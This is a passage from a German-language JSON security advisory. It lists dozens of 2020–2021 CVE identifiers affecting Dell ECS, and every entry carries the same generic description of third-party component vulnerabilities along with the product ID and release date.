"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-9546"
},
{
"cve": "CVE-2020-9547",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-9547"
},
{
"cve": "CVE-2020-9548",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-9548"
},
{
"cve": "CVE-2021-20190",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-20190"
},
{
"cve": "CVE-2021-20323",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-20323"
},
{
"cve": "CVE-2021-21290",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-21290"
},
{
"cve": "CVE-2021-21295",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-21295"
},
{
"cve": "CVE-2021-21409",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-21409"
},
{
"cve": "CVE-2021-23840",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-23840"
},
{
"cve": "CVE-2021-23841",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-23841"
},
{
"cve": "CVE-2021-2471",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-2471"
},
{
"cve": "CVE-2021-25642",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-25642"
},
{
"cve": "CVE-2021-26341",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-26341"
},
{
"cve": "CVE-2021-27918",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-27918"
},
{
"cve": "CVE-2021-28153",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-28153"
},
{
"cve": "CVE-2021-28165",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-28165"
},
{
"cve": "CVE-2021-28169",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-28169"
},
{
"cve": "CVE-2021-28861",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-28861"
},
{
"cve": "CVE-2021-29425",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-29425"
},
{
"cve": "CVE-2021-30560",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-30560"
},
{
"cve": "CVE-2021-3114",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-3114"
},
{
"cve": "CVE-2021-33036",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-33036"
},
{
"cve": "CVE-2021-33194",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-33194"
},
{
"cve": "CVE-2021-33195",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-33195"
},
{
"cve": "CVE-2021-33196",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-33196"
},
{
"cve": "CVE-2021-33197",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-33197"
},
{
"cve": "CVE-2021-33503",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-33503"
},
{
"cve": "CVE-2021-33655",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-33655"
},
{
"cve": "CVE-2021-33656",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-33656"
},
{
"cve": "CVE-2021-3424",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-3424"
},
{
"cve": "CVE-2021-34428",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-34428"
},
{
"cve": "CVE-2021-3449",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-3449"
},
{
"cve": "CVE-2021-3450",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-3450"
},
{
"cve": "CVE-2021-3530",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-3530"
},
{
"cve": "CVE-2021-36221",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-36221"
},
{
"cve": "CVE-2021-36373",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-36373"
},
{
"cve": "CVE-2021-36374",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-36374"
},
{
"cve": "CVE-2021-3648",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-3648"
},
{
"cve": "CVE-2021-36690",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-36690"
},
{
"cve": "CVE-2021-3711",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-3711"
},
{
"cve": "CVE-2021-3712",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-3712"
},
{
"cve": "CVE-2021-37136",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-37136"
},
{
"cve": "CVE-2021-37137",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-37137"
},
{
"cve": "CVE-2021-37404",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-37404"
},
{
"cve": "CVE-2021-37533",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-37533"
},
{
"cve": "CVE-2021-3754",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-3754"
},
{
"cve": "CVE-2021-3778",
"notes": [
{
"category": "description",
